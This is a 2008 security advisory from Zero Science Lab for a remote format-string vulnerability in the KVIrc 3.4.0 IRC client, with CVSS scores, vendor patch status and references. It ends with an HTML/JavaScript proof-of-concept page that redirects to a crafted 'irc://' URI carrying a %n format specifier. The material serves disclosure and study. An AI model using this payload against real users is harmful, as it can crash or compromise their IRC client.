Gjoko KrsticZSL-2008-4901KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
7.6 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
7.8 High
AI Score
Confidence
Low
0.084 Low
EPSS
Percentile
94.5%
Title: KVIrc 3.4.0 Virgo Remote Format String Exploit PoC
Advisory ID: ZSL-2008-4901
Type: Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 24.10.2008
Summary
KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC addicted developers around the world.
Description
KVIrc is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts may cause denial-of-service conditions.
Vendor
Szymon Stefanek - <http://www.kvirc.net>
Affected Version
3.4.0 Virgo
Tested On
Microsoft Windows XP Professional SP2 (English)
Vendor Status
[29.10.2008] Vendor has knowledge about the issue.
[04.11.2008] Vendor releases patch.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://www.milw0rm.com/exploits/6832>
[2] <http://www.packetstormsecurity.org/filedesc/kvirc-format.txt.html>
[3] http://www.sebug.net/exploit/4944
[4] <http://www.securityfocus.com/bid/31912>
[5] <http://www.vupen.com/english/advisories/2008/2926>
[6] http://www.secunia.com/advisories/32410
[7] <http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html>
[8] <https://vulners.com/cve/CVE-2008-4748>
[9] <http://xforce.iss.net/xforce/xfdb/46114>
[10] <http://it.com.mk/index.php/Gjoko-Krstikj/Sigurnost/KVIrc-v3.4.0-Virgo-Remote-Format-String-Exploit-PoC>
[11] <http://www.osvdb.org/show/osvdb/49352>
Changelog
[24.10.2008] - Initial release
[27.10.2008] - Added reference [10]
[29.10.2008] - Added Vendor Status
[04.11.2008] - Updated Vendor Status
[03.05.2012] - Added reference [11]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.
Product web page: http://www.kvirc.net/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
24.10.2008
--><html>
<head><title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head><body>
<center> <br/> <br/> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
function poc()
{
window.location.href = "irc://A:%n -i";
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
poc();
}
else
{
window.location.href = "http://www.kvirc.net";
}
</script> </body></html>
Related
7.6 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:H/Au:N/C:C/I:C/A:C
7.8 High
AI Score
Confidence
Low
0.084 Low
EPSS
Percentile
94.5%